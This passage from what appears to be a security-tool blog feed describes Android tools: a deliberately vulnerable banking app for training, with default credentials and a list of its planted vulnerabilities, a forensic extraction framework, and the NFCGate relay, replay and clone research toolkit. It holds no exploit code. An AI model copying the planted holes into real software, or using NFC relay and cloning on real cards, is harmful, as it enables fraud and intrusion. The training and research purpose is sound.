</blockquote> </li> <li> <p><a href="https://marketplace.visualstudio.com/items?itemName=LoyieKing.smalise" rel="nofollow" target="_blank" title="Android Reverse Engineering WorkBench for VS Code (24)"><strong>Smalise</strong></a> (recommended)</p> <blockquote> <p>It makes working with <code>smali</code> files a breeze.</p> </blockquote> </li> </ul> <br /><span style="font-size: x-large;"><b>Credits</b></span><br /> <ul> <li><a href="https://github.com/Feimaomii" rel="nofollow" target="_blank" title="Feimaomii">Feimaomii</a> for the awesome logo</li> <li><a href="https://github.com/amsharma44" rel="nofollow" target="_blank" title="Aman Sharma">Aman Sharma</a> for improved Windows support</li> <li><a href="https://github.com/iBotPeaches" rel="nofollow" target="_blank" title="iBotPeaches">iBotPeaches</a>, <a href="https://github.com/brutall" rel="nofollow" target="_blank" title="brutall">brutall</a> and <a href="https://github.com/JesusFreke" rel="nofollow" target="_blank" title="JesusFreke">JesusFreke</a> for Apktool & Smali</li> <li><a href="https://github.com/patrickfav" rel="nofollow" target="_blank" title="patrickfav">patrickfav</a> for uber-apk-signer</li> <li><a href="https://github.com/skylot" rel="nofollow" target="_blank" title="skylot">skylot</a> for Jadx</li> </ul> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/Surendrajat/APKLab" rel="nofollow" target="_blank" title="Download APKLab">Download APKLab</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-41994666788039296212020-11-27T08:30:00.013-03:002020-11-27T08:30:11.626-03:00Damn-Vulnerable-Bank - Vulnerable Banking Application For Android<div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-IjDaCUJ_k8A/X8Db3dUQiFI/AAAAAAAAUew/8Hywvt8W6pYu8q5jQi3JA9MoVGB2u7CMACNcBGAsYHQ/s2048/Damn-Vulnerable-Bank_1_screen1.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="2048" data-original-width="1048" height="640" src="https://1.bp.blogspot.com/-IjDaCUJ_k8A/X8Db3dUQiFI/AAAAAAAAUew/8Hywvt8W6pYu8q5jQi3JA9MoVGB2u7CMACNcBGAsYHQ/w328-h640/Damn-Vulnerable-Bank_1_screen1.jpeg" width="328" /></a></div><p><br /></p><p>Damn <a href="https://www.kitploit.com/search/label/Vulnerable" target="_blank" title="Vulnerable">Vulnerable</a> Bank <a href="https://www.kitploit.com/search/label/Android%20Application" target="_blank" title="Android Application">Android Application</a> aims to provide an interface for everyone to get a detailed understanding with internals and security aspects of android application.</p><span><a name='more'></a></span><p><br /></p><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-RMupfO6CQno/X8Db9HQgo4I/AAAAAAAAUe0/xcbCc5QBGLklPd722cAVqgwnOBAnUpZ-gCNcBGAsYHQ/s2048/Damn-Vulnerable-Bank_2_screen2.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="2048" data-original-width="1054" height="640" src="https://1.bp.blogspot.com/-RMupfO6CQno/X8Db9HQgo4I/AAAAAAAAUe0/xcbCc5QBGLklPd722cAVqgwnOBAnUpZ-gCNcBGAsYHQ/w330-h640/Damn-Vulnerable-Bank_2_screen2.jpeg" width="330" /></a></div><p><br /></p><span style="font-size: large;"><b>How to Use Application</b></span><br /> <ul> <li>Clone the repository and run the <a href="https://github.com/rewanth1997/Damn-Vulnerable-Bank/tree/master/BackendServer" rel="nofollow" target="_blank" title="Backend Server">Backend Server</a> as per instructions in the link.</li> <li>We have released the Apk so after downloading install it via adb or manual.</li> <li>After Installation open the App and add Backend IP in Homescreen</li> <li>Test running status by pressing health check</li> <li>Now create an account by signup option and then login with your credentials</li> <li>Now you can see the dashboard and perform banking operations</li> <li>Login as admin to approve beneficiary</li> <li>The database is pre-populated with a few users for quick exploration.</li> </ul> <table> <tr> <th>Username</th> <th>Password</th> <th>Account Number</th> <th>Beneficiaries</th> <th>Admin privileges</th> </tr> <tr> <td>user1</td> <td>password1</td> <td>111111</td> <td>222222, 333333, 444444</td> <td>No</td> </tr> <tr> <td>user2</td> <td>password2</td> <td>222222</td> <td>None</td> <td>No</td> </tr> <tr> <td>user3</td> <td>password3</td> <td>333333</td> <td>None</td> <td>No</td> </tr> <tr> <td>user4</td> <td>password4</td> <td>444444</td> <td>None</td> <td>No</td> </tr> <tr> <td>admin</td> <td>admin</td> <td>999999</td> <td>None</td> <td>Yes</td> </tr> </table> <br /><span style="font-size: large;"><b>Features</b></span><br /> <ul class="contains-task-list"> <li class="task-list-item">Sign up</li> <li class="task-list-item">Login</li> <li class="task-list-item">My profile interface</li> <li class="task-list-item">Change password</li> <li class="task-list-item">Settings interface to update backend URL</li> <li class="task-list-item">Add <a href="https://www.kitploit.com/search/label/Fingerprint" target="_blank" title="fingerprint">fingerprint</a> check before transferring/viewing funds</li> <li class="task-list-item">Add pin check before transferring/viewing funds</li> <li class="task-list-item">View balance</li> <li class="task-list-item">Transfer money <ul class="contains-task-list"> <li class="task-list-item">Via manual entry</li> <li class="task-list-item">Via QR scan</li> </ul> </li> <li class="task-list-item">Add beneficiary</li> <li class="task-list-item">Delete beneficiary</li> <li class="task-list-item">View beneficiary</li> <li class="task-list-item">View transactions history</li> <li class="task-list-item">Download transactions history</li> </ul> <br /><span style="font-size: large;"><b>Building the Apk with Obfuscation</b></span><br /> <ul> <li>Go to Build options and select Generate Signed Bundled/Apk</li> <li>Then select Apk as option and click next</li> <li>Now we need a keystore to sign an apk</li> <li>Create a new keystore and remember its password</li> <li>After creating select that keystore and enter password</li> <li>Now select Build variant as Release and signature version as V2</li> <li>Now we can build the apk successfully</li> </ul> <br /><span style="font-size: large;"><b>List of <a href="https://www.kitploit.com/search/label/vulnerabilities" target="_blank" title="vulnerabilities">vulnerabilities</a> in the application</b></span><br /> <p>To keep things crisp and interesting, we hidden this section. Do not toggle this button if you want a fun and challenging experience. Try to explore the application, find all the possible vulnerabilities and then cross check your findings with this list.</p> <details> <summary>Spoiler Alert</summary> <ul class="contains-task-list"> <li class="task-list-item"><input checked="" class="task-list-item-checkbox" disabled="" id="" type="checkbox" /> Root and emulator detection</li> <li class="task-list-item"><input checked="" class="task-list-item-checkbox" disabled="" id="" type="checkbox" /> Anti-debugging checks (prevents hooking with frida, jdb, etc)</li> <li class="task-list-item"><input class="task-list-item-checkbox" disabled="" id="" type="checkbox" /> SSL pinning - pin the certificate/public key</li> <li class="task-list-item"><input checked="" class="task-list-item-checkbox" disabled="" id="" type="checkbox" /> Obfuscate the entire code</li> <li class="task-list-item"><input checked="" class="task-list-item-checkbox" disabled="" id="" type="checkbox" /> Encrypt all requests and responses</li> <li class="task-list-item"><input checked="" class="task-list-item-checkbox" disabled="" id="" type="checkbox" /> Hardcoded sensitive information</li> <li class="task-list-item"><input checked="" class="task-list-item-checkbox" disabled="" id="" type="checkbox" /> Logcat leakage</li> <li class="task-list-item"><input class="task-list-item-checkbox" disabled="" id="" type="checkbox" /> Insecure storage (saved credit card numbers maybe)</li> <li class="task-list-item"><input checked="" class="task-list-item-checkbox" disabled="" id="" type="checkbox" /> Exported activities</li> <li class="task-list-item"><input class="task-list-item-checkbox" disabled="" id="" type="checkbox" /> JWT token</li> <li class="task-list-item"><input checked="" class="task-list-item-checkbox" disabled="" id="" type="checkbox" /> Webview integration</li> <li class="task-list-item"><input checked="" class="task-list-item-checkbox" disabled="" id="" type="checkbox" /> Deep links</li> <li class="task-list-item"><input class="task-list-item-checkbox" disabled="" id="" type="checkbox" /> IDOR</li> </ul> </details> <br /><span style="font-size: large;"><b>Backend to-do</b></span><br /> <ul class="contains-task-list"> <li class="task-list-item">Add profile and change-password routes</li> <li class="task-list-item">Create different secrets for admin and other users</li> <li class="task-list-item">Add dynamic generation of secrets to verify JWT tokens</li> <li class="task-list-item">Introduce bug in jwt verification</li> <li class="task-list-item">Find a way to store database and mount it while using docker</li> <li class="task-list-item">Dockerize environment</li> </ul> <br /><span style="font-size: large;"><b>Authors</b></span><br /> <p>Thanks to these amazing people</p> <table> <tr> <th></th> <th></th> <th></th> </tr> <tr> <td>Rewanth Cool (Rest API)</td> <td><a href="https://github.com/rewanth1997/" rel="nofollow" target="_blank" title="Github">Github</a></td> <td><a href="https://www.linkedin.com/in/rewanthcool/" rel="nofollow" target="_blank" title="LinkedIn">LinkedIn</a></td> </tr> <tr> <td>Hrushikesh Kakade (Android App)</td> <td><a href="https://github.com/HrushikeshK/" rel="nofollow" target="_blank" title="Github">Github</a></td> <td><a href="https://www.linkedin.com/in/hrushikeshkakade/" rel="nofollow" target="_blank" title="LinkedIn">LinkedIn</a></td> </tr> <tr> <td>Akshansh Jaiswal (Android App)</td> <td><a href="https://github.com/jaiswalakshansh" rel="nofollow" target="_blank" title="Github">Github</a></td> <td><a href="https://www.linkedin.com/in/akshanshjaiswal/" rel="nofollow" target="_blank" title="LinkedIn">LinkedIn</a></td> </tr> </table> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/rewanth1997/Damn-Vulnerable-Bank" rel="nofollow" target="_blank" title="Download Damn-Vulnerable-Bank">Download Damn-Vulnerable-Bank</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-22825096726509058912020-11-12T17:30:00.005-03:002020-11-12T17:30:00.486-03:00FAMA - Forensic Analysis For Mobile Apps<div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-F9bNSgubhdI/X6zFa5P9PYI/AAAAAAAAUUo/K8JtZ-vh05Iy8rSDav8xkK8Rvp-ZaGpgQCNcBGAsYHQ/s1350/FAMA_2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="561" data-original-width="1350" height="266" src="https://1.bp.blogspot.com/-F9bNSgubhdI/X6zFa5P9PYI/AAAAAAAAUUo/K8JtZ-vh05Iy8rSDav8xkK8Rvp-ZaGpgQCNcBGAsYHQ/w640-h266/FAMA_2.png" width="640" /></a></div><p><br /></p><span style="font-size: x-large;"><b>LabCIF - <a href="https://www.kitploit.com/search/label/Forensic%20Analysis" target="_blank" title="Forensic Analysis">Forensic Analysis</a> for Mobile Apps</b></span><br /> <br /><span style="font-size: large;"><b>Getting Started</b></span><br /> <p>Android extraction and <a href="https://www.kitploit.com/search/label/Analysis%20Framework" target="_blank" title="analysis framework">analysis framework</a> with an integrated Autopsy Module. Dump easily user data from a device and generate powerful reports for Autopsy or external applications.</p><span><a name='more'></a></span><div><br /></div><span style="font-size: large;"><b>Functionalities</b></span><br /> <ul> <li>Extract user application data from an Android device with ADB (root and ADB required).</li> <li>Dump user data from an android image or mounted path.</li> <li>Easily build modules for a specific Android application.</li> <li>Generate clean and readable JSON reports.</li> <li>Complete integrated Autopsy compatibility (datasource processor module, ingest module, report module, geolocation, communication and timeline support).</li> <li>Export HTML report based on the current case.</li> </ul> <br /><b>Report Screenshots</b><br /> <p><br /></p> <div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-VptKOPmlQUE/X6zFJnXNYVI/AAAAAAAAUUg/iBWosC52ufk6EedWb1ytAgDfS7hWIpNDgCNcBGAsYHQ/s1166/FAMA_1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="356" data-original-width="1166" height="196" src="https://1.bp.blogspot.com/-VptKOPmlQUE/X6zFJnXNYVI/AAAAAAAAUUg/iBWosC52ufk6EedWb1ytAgDfS7hWIpNDgCNcBGAsYHQ/w640-h196/FAMA_1.png" width="640" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-eRSQh87vBeU/X6zFJpZEzcI/AAAAAAAAUUc/yljgC6HGon4A8YN8mgwcSZGVNn7oFLtmACNcBGAsYHQ/s1350/FAMA_2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="561" data-original-width="1350" height="266" src="https://1.bp.blogspot.com/-eRSQh87vBeU/X6zFJpZEzcI/AAAAAAAAUUc/yljgC6HGon4A8YN8mgwcSZGVNn7oFLtmACNcBGAsYHQ/w640-h266/FAMA_2.png" width="640" /></a></div><p><br /></p><span style="font-size: large;"><b>Prerequisites</b></span><br /> <ul> <li><a href="https://www.python.org/downloads/" rel="nofollow" target="_blank" title="Python">Python</a> (2.7+)</li> <li><a href="https://www.sleuthkit.org/autopsy/" rel="nofollow" target="_blank" title="Autopsy">Autopsy</a> (optional)</li> </ul> <br /><span style="font-size: large;"><b>How to use</b></span><br /> <p>The script can be used directly in terminal or as Autopsy module.</p> <br /><b>Running from Terminal</b><br /> <div><pre><code>usage: start.py [-h] [-d DUMP [DUMP ...]] [-p PATH] [-o OUTPUT] [-a] app<br /><br />Forensics Artefacts Analyzer<br /><br />positional arguments:<br /> app Application or package to be analyzed <tiktok> or <com.zhiliaoapp.musically><br /><br />optional arguments:<br /> -h, --help show this help message and exit<br /> -d DUMP [DUMP ...], --dump DUMP [DUMP ...] Analyze specific(s) dump(s) <20200307_215555 ...><br /> -p PATH, --path PATH Dump app data in path (mount or folder structure)<br /> -o OUTPUT, --output OUTPUT Report output path folder<br /> -a, --adb Dump app data directly from device with ADB<br /> -H, --html Generate HTML report</code></pre></div> <br /><b>Running from Autopsy</b><br /> <ol> <li>Download repository contents (<a href="https://github.com/labcif/FAMA/archive/master.zip" rel="nofollow" target="_blank" title="zip">zip</a>).</li> <li>Open Autopsy -> Tools -> Python Plugins</li> <li>Unzip previously downloaded zip in <code>python_modules</code> folder.</li> <li>Restart Autopsy, create a case and select the module.</li> <li>Select your module options in the Ingest Module window selector.</li> <li>Click "Generate Report" to generate an HTML report of the case.</li> </ol> <br /><span style="font-size: large;"><b>Build an application module</b></span><br /> <p>Do you need a <a href="https://www.kitploit.com/search/label/Forensics" target="_blank" title="forensics">forensics</a> module for a specific Android application? Follow the instructions <a href="https://github.com/labcif/FAMA/blob/master/modules/README.md" rel="nofollow" target="_blank" title="here">here</a> and build a module by yourself.</p> <br /><span style="font-size: large;"><b>Authors</b></span><br /> <ul> <li><strong>José Francisco</strong> - <a href="https://github.com/98jfran" rel="nofollow" target="_blank" title="GitHub">GitHub</a></li> <li><strong>Ruben Nogueira</strong> - <a href="https://github.com/rubnogueira" rel="nofollow" target="_blank" title="GitHub">GitHub</a></li> </ul> <br /><span style="font-size: large;"><b>Mentors</b></span><br /> <ul> <li><strong>Miguel Frade</strong> - <a href="https://github.com/mfrade" rel="nofollow" target="_blank" title="GitHub">GitHub</a></li> <li><strong>Patrício Domingues</strong> - <a href="https://github.com/PatricioDomingues" rel="nofollow" target="_blank" title="GitHub">GitHub</a></li> </ul> <p>Project developed as final project for <a href="https://www.kitploit.com/search/label/Computer%20Engineering" target="_blank" title="Computer Engineering">Computer Engineering</a> course in Escola Superior de Tecnologia e Gestão de Leiria.</p> <br /><span style="font-size: large;"><b>Environments Tested</b></span><br /> <ul> <li>Windows (primary)</li> <li>Linux</li> <li>Mac OS</li> </ul> <br /><span style="font-size: large;"><b>License</b></span><br /> <p>This project is licensed under the terms of the GNU GPL v3 License.</p> <ul> <li><a href="https://developer.android.com/studio/releases/platform-tools" rel="nofollow" target="_blank" title="ADB">ADB</a> - Android Software Development Kit License Agreement</li> <li><a href="http://rtner.de/software/base64.html" rel="nofollow" target="_blank" title="Base64">Base64</a> - GNU GPL v2 License</li> <li><a href="https://getbootstrap.com/" rel="nofollow" target="_blank" title="Bootstrap">Bootstrap</a> - MIT License</li> <li><a href="https://github.com/feathericons/feather" rel="nofollow" target="_blank" title="feather">feather</a> - MIT License</li> <li><a href="https://www.flaticon.com/packs/user-interface-111" rel="nofollow" target="_blank" title="Freepic Icons">Freepic Icons</a></li> <li><a href="https://jquery.com/" rel="nofollow" target="_blank" title="jQuery">jQuery</a> - MIT License</li> <li><a href="https://github.com/eisbehr-/jquery.lazy" rel="nofollow" target="_blank" title="jQuery.lazy">jQuery.lazy</a> - MIT License</li> <li><a href="https://github.com/Leaflet/Leaflet" rel="nofollow" target="_blank" title="leaflet">leaflet</a> - BSD 2-Clause "Simplified" License</li> <li><a href="https://github.com/bpampuch/pdfmake" rel="nofollow" target="_blank" title="pdfmake">pdfmake</a> - MIT License</li> <li><a href="https://github.com/mdegrazia/SQLite-Deleted-Records-Parser" rel="nofollow" target="_blank" title="SQLite-Deleted-Records-Parser">SQLite-Deleted-Records-Parser</a> - GNU GPL v3 License</li> <li><a href="https://github.com/witwall/undark" rel="nofollow" target="_blank" title="Undark">Undark</a> - BSD License 2.0</li> </ul> <br /><ul> </ul> <br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/labcif/FAMA" rel="nofollow" target="_blank" title="Download FAMA">Download FAMA</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-51400642444956167582020-11-11T08:30:00.013-03:002020-11-11T08:30:00.270-03:00NFCGate - An NFC Research Toolkit Application For Android<div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-r7mQY0joQaw/X6iIPROLwTI/AAAAAAAAUUA/M-AJW17UPbkehfYxNZ-mO3B9n8g8WcnZACNcBGAsYHQ/s348/nfc.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="145" data-original-width="348" height="266" src="https://1.bp.blogspot.com/-r7mQY0joQaw/X6iIPROLwTI/AAAAAAAAUUA/M-AJW17UPbkehfYxNZ-mO3B9n8g8WcnZACNcBGAsYHQ/w640-h266/nfc.png" width="640" /></a></div><p><br /></p> <p>NFCGate is an Android application meant to capture, analyze, or modify NFC traffic. It can be used as a researching tool to <a href="https://www.kitploit.com/search/label/Reverse%20Engineer" target="_blank" title="reverse engineer">reverse engineer</a> protocols or assess the security of protocols against traffic modifications.</p> <span><a name='more'></a></span><div><br /></div><span style="font-size: large;"><b>Notice</b></span><br /> <p>This application was developed for security research purposes by students of the <a href="https://www.seemoo.tu-darmstadt.de/" rel="nofollow" target="_blank" title="Secure Mobile Networking Lab">Secure Mobile Networking Lab</a> at <a href="https://www.tu-darmstadt.de/" rel="nofollow" target="_blank" title="TU Darmstadt">TU Darmstadt</a>. Please do not use this application for malicious purposes.</p> <br /><span style="font-size: large;"><b>Features</b></span><br /> <ul> <li><strong>On-device capture</strong>: Captures NFC traffic sent and received by other applications running on the device.</li> <li><strong>Relay</strong>: Relays NFC traffic between two devices using <a href="https://github.com/nfcgate/server" rel="nofollow" target="_blank" title="a server">a server</a>. One device operates as a "reader" reading an NFC tag, the other device emulates an NFC tag using the Host Card Emulation (HCE).</li> <li><strong>Replay</strong>: Replays previously captured NFC traffic in either "reader" or "tag" mode.</li> <li><strong>Clone</strong>: Clones the initial tag information (e.g. ID).</li> <li><a href="https://github.com/pcapng/pcapng" rel="nofollow" target="_blank" title="pcapng">pcapng</a> export of captured NFC traffic, readable by Wireshark.</li> </ul> <br /><span style="font-size: large;"><b>Requirements for specific modes</b></span><br /> <ul> <li>NFC support</li> <li>Android 4.4+ (API level 19+)</li> <li><a href="https://github.com/ElderDrivers/EdXposed" rel="nofollow" target="_blank" title="EdXposed">EdXposed</a> or <a href="https://repo.xposed.info/" rel="nofollow" target="_blank" title="Xposed">Xposed</a>: On-device capture, relay tag mode, replay tag mode, clone mode.</li> <li>ARMv8-A, ARMv7: Relay tag mode, replay tag mode, clone mode.</li> <li><a href="https://developer.android.com/guide/topics/connectivity/nfc/hce" rel="nofollow" target="_blank" title="HCE">HCE</a>: Relay tag mode, replay tag mode, clone mode.</li> </ul> <br /><span style="font-size: large;"><b>Usage</b></span><br /> <br /><b>Building</b><br /> <ol> <li>Initialize submodules: <code>git submodule update --init</code></li> <li>Build using <a href="https://www.kitploit.com/search/label/Android%20Studio" target="_blank" title="Android Studio">Android Studio</a> or Gradle</li> </ol> <br /><b>Operating Modes</b><br /> <p>As instructions differ per mode, each mode is described in detail in its own document in <code>doc/mode/</code>:</p> <ul> <li><a href="https://github.com/nfcgate/nfcgate/blob/v2/doc/mode/OnDevice.md" rel="nofollow" target="_blank" title="An NFC research toolkit application for Android (10)"><strong>On-device capture</strong></a></li> <li><a href="https://github.com/nfcgate/nfcgate/blob/v2/doc/mode/Relay.md" rel="nofollow" target="_blank" title="An NFC research toolkit application for Android (11)"><strong>Relay</strong></a></li> <li><a href="https://github.com/nfcgate/nfcgate/blob/v2/doc/mode/Replay.md" rel="nofollow" target="_blank" title="An NFC research toolkit application for Android (12)"><strong>Replay</strong></a></li> <li><a href="https://github.com/nfcgate/nfcgate/blob/v2/doc/mode/Clone.md" rel="nofollow" target="_blank" title="An NFC research toolkit application for Android (13)"><strong>Clone</strong></a></li> </ul> <br /><b>Pcapng Export</b><br /> <p>Captured traffic can be exported in or imported from the <a href="https://github.com/pcapng/pcapng" rel="nofollow" target="_blank" title="pcapng">pcapng</a> file format. For example, Wireshark can be used to further analyze NFC traffic. A detailed description of the import and export functionality is documented in <a href="https://github.com/nfcgate/nfcgate/blob/v2/doc/pcapng.md" rel="nofollow" target="_blank" title="doc/pcapng.md">doc/pcapng.md</a>.</p> <br /><span style="font-size: large;"><b>Compatibility</b></span><br /> <p>NFCGate provides an in-app status check. For further notes on compatibility see the <a href="https://github.com/nfcgate/nfcgate/blob/v2/doc/Compatibility.md" rel="nofollow" target="_blank" title="compatibility document">compatibility document</a>.</p> <br /><span style="font-size: large;"><b>Known Issues and Caveats</b></span><br /> <p>Please consider the following issues and caveats before using the application (and especially before filing a bug report).</p> <br /><b>NFC Stack</b><br /> <p>When using modes, that utilize HCE, the phone has to implement the <a href="https://nfc-forum.org/our-work/specifications-and-application-documents/specifications/nfc-controller-interface-nci-specification/" rel="nofollow" target="_blank" title="NFC Controller Interface (NCI)">NFC Controller Interface (NCI)</a> specification. Most of the phones should implement this specification when offering HCE support.</p> <br /><b>Confidentiality of Data Channel (relay)</b><br /> <p>Right now, all data in relay mode is sent <em>unencrypted</em> over the network. We may or may not get around to implementing cryptographic protection, but for now, consider everything you send over the network to be readable by anyone interested, unless you use extra protection like VPNs. Keep that in mind while performing your own tests.</p> <br /><b>Compatibility with Cards (relay, replay, clone)</b><br /> <p>We can only proxy tags supported by Android. For example, Android no longer offers support for MiFare classic chips, so these cards are not supported. When in doubt, use an application like NFC Tag info to find out if your tag is compatible. Also, at the moment, every tag technology supported by Android's HCE is supported (A, B, F), however NFC-B and NFC-F remain untested. NFC-A tags are the most common tags (for example, both the MiFare DESFire and specialized chips like the ones in electronic passports use NFC-A), but you may experience problems if you use other tags.</p> <br /><b>Compatibility with readers (relay)</b><br /> <p>This application only works with readers which do not implement additional security measures. One security measure which will prevent our application from working in relay mode is when the reader checks the time it takes the card to respond (or, to use the more general case, if the reader implements "distance bounding"). The network transmission adds a noticeable delay to any transaction, so any secure reader will not accept our proxied replies.<br /> This does not affect other operating modes.</p> <br /><b>Android NFC limitations (relay, replay)</b><br /> <p>Some features of NFC are not supported by Android and thus cannot be used with our application. We have experienced cases where the NFC field generated by the phone was not strong enough to properly power more advanced features of some NFC chips (e.g. cryptographic operations). Keep this in mind if you are testing chips we have not experimented with.</p> <br /><span style="font-size: large;"><b>Publications and Media</b></span><br /> <p>This application was <a href="https://www.usenix.org/conference/woot20/presentation/klee" rel="nofollow" target="_blank" title="presented at the 14th USENIX Workshop on Offensive Technologies (WOOT '20)">presented at the 14th USENIX Workshop on Offensive Technologies (WOOT '20)</a>. An <a href="https://arxiv.org/abs/2008.03913" rel="nofollow" target="_blank" title="arXiv preprint can be found here">arXiv preprint can be found here</a>.</p> <p>An early version of this application was presented at WiSec 2015. The <a href="https://blog.velcommuta.de/wp-content/uploads/2015/07/nfcgate-extended-abstract.pdf" rel="nofollow" target="_blank" title="extended Abstract">extended Abstract</a> and <a href="https://blog.velcommuta.de/wp-content/uploads/2015/07/NFCGate-Poster.pdf" rel="nofollow" target="_blank" title="poster">poster</a> can be found on the <a href="https://blog.velcommuta.de/publications/" rel="nofollow" target="_blank" title="website">website</a> of one of the authors. It was also presented in a brief <a href="https://media.ccc.de/browse/conferences/camp2015/camp2015-6862-lightning_talks_day_2.html#video&t=300" rel="nofollow" target="_blank" title="Lightning Talk">Lightning Talk</a> at the <a href="https://events.ccc.de/camp/2015/wiki/Main_Page" rel="nofollow" target="_blank" title="Chaos Communication Camp 2015">Chaos Communication Camp 2015</a>.</p> <br /><span style="font-size: large;"><b>Reference our Project</b></span><br /> <p>Any use of this project which results in an academic publication or other publication which includes a bibliography should include a citation to NFCGate:</p> <pre><code>@inproceedings {257188,<br /> author = {Steffen Klee and Alexandros Roussos and Max Maass and Matthias Hollick},<br /> title = {NFCGate: Opening the Door for {NFC} Security Research with a Smartphone-Based Toolkit},<br /> booktitle = {14th {USENIX} Workshop on Offensive Technologies ({WOOT} 20)},<br /> year = {2020},<br /> url = {https://www.usenix.org/conference/woot20/presentation/klee},<br /> publisher = {{USENIX} Association},<br /> month = aug,<br />}<br /></code></pre> <br /><span style="font-size: large;"><b>License</b></span><br /> <pre><code> Copyright 2015-2020 NFCGate Team<br /><br /> Licensed under the Apache License, Version 2.0 (the "License");<br /> you may not use this file except in <a href="https://www.kitploit.com/search/label/Compliance" target="_blank" title="compliance">compliance</a> with the License.<br /> You may obtain a copy of the License at<br /><br /> http://www.apache.org/licenses/LICENSE-2.0<br /><br /> Unless required by applicable law or agreed to in writing, software<br /> <a href="https://www.kitploit.com/search/label/Distributed" target="_blank" title="distributed">distributed</a> under the License is distributed on an "AS IS" BASIS,<br /> WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.<br /> See the License for the specific language governing permissions and<br /> limitations under the License.<br /></code></pre> <br /><span style="font-size: large;"><b>Contact</b></span><br /> <ul> <li><a href="https://www.informatik.tu-darmstadt.de/seemoo/team_seemoo/steffen_klee/steffen_klee.en.jsp" rel="nofollow" target="_blank" title="Steffen Klee">Steffen Klee</a></li> <li><a href="https://www.informatik.tu-darmstadt.de/seemoo/team_seemoo/max_maass/index.en.jsp" rel="nofollow" target="_blank" title="Max Maass">Max Maass</a></li> </ul> <br /><span style="font-size: large;"><b>Used Libraries</b></span><br /> <ul> <li><a href="https://github.com/iqiyi/xHook" rel="nofollow" target="_blank" title="xHook">xHook</a> (Licensed under the <a href="https://opensource.org/licenses/MIT" rel="nofollow" target="_blank" title="MIT License">MIT License</a>)</li> <li><a href="https://github.com/rovo89/XposedBridge" rel="nofollow" target="_blank" title="Xposed Bridge">Xposed Bridge</a> (Licensed under the <a href="http://opensource.org/licenses/Apache-2.0" rel="nofollow" target="_blank" title="Apache License v2.0">Apache License v2.0</a>)</li> <li><a href="https://android.googlesource.com/platform/external/libnfc-nci/" rel="nofollow" target="_blank" title="LibNFC-NCI">LibNFC-NCI</a> (Licensed under the <a href="http://opensource.org/licenses/Apache-2.0" rel="nofollow" target="_blank" title="Apache License v2.0">Apache License v2.0</a>)</li> <li><a href="https://github.com/protocolbuffers/protobuf" rel="nofollow" target="_blank" title="Protobuf">Protobuf</a> (Licensed under the modified <a href="http://opensource.org/licenses/BSD-3-Clause" rel="nofollow" target="_blank" title="BSD 3-Clause License">BSD 3-Clause License</a>)</li> <li><a href="https://github.com/medyo/android-about-page" rel="nofollow" target="_blank" title="Android About Page">Android About Page</a> (Licensed under the <a href="https://opensource.org/licenses/MIT" rel="nofollow" target="_blank" title="MIT License">MIT License</a>)</li> <li><a href="https://github.com/jaredrummler/AndroidDeviceNames" rel="nofollow" target="_blank" title="Android Device Names">Android Device Names</a> (Licensed under the <a href="http://opensource.org/licenses/Apache-2.0" rel="nofollow" target="_blank" title="Apache License v2.0">Apache License v2.0</a>)</li> <li><a href="https://github.com/Gericop/Android-Support-Preference-V7-Fix" rel="nofollow" target="_blank" title="Android Support library - preference v7 bugfix">Android Support library - preference v7 bugfix</a> (Released into the public domain and partly licensed under the <a href="http://opensource.org/licenses/Apache-2.0" rel="nofollow" target="_blank" title="Apache License v2.0">Apache License v2.0</a>)</li> <li><a href="https://developer.android.com/topic/libraries/architecture/room" rel="nofollow" target="_blank" title="Android Room">Android Room</a> (Licensed under the <a href="http://opensource.org/licenses/Apache-2.0" rel="nofollow" target="_blank" title="Apache License v2.0">Apache License v2.0</a>)</li> <li><a href="https://developer.android.com/topic/libraries/architecture/lifecycle" rel="nofollow" target="_blank" title="Android Lifecycle">Android Lifecycle</a> (Licensed under the <a href="http://opensource.org/licenses/Apache-2.0" rel="nofollow" target="_blank" title="Apache License v2.0">Apache License v2.0</a>)</li> </ul> <br /><span style="font-size: large;"><b>Credits</b></span><br /> <ul> <li><a href="https://github.com/crmulliner/adbi" rel="nofollow" target="_blank" title="ADBI">ADBI</a>: ARM and THUMB inline hooking</li> </ul> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/nfcgate/nfcgate" rel="nofollow" target="_blank" title="Download Nfcgate">Download Nfcgate</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-39135124403604499542020-10-19T17:30:00.001-03:002020-10-19T17:30:10.215-03:00Apk-Medit - Memory Search And Patch Tool On Debuggable Apk Without Root & Ndk<div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-RqXEBotLg98/X40OqtZc7LI/AAAAAAAAUE4/pikPCjcpYe08SkjPCkqsQIndoT_duv_vgCNcBGAsYHQ/s1312/terminal.gif" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="785" data-original-width="1312" height="382" src="https://1.bp.blogspot.com/-RqXEBotLg98/X40OqtZc7LI/AAAAAAAAUE4/pikPCjcpYe08SkjPCkqsQIndoT_duv_vgCNcBGAsYHQ/w640-h382/terminal.gif" width="640" /></a></div><p><br /></p> 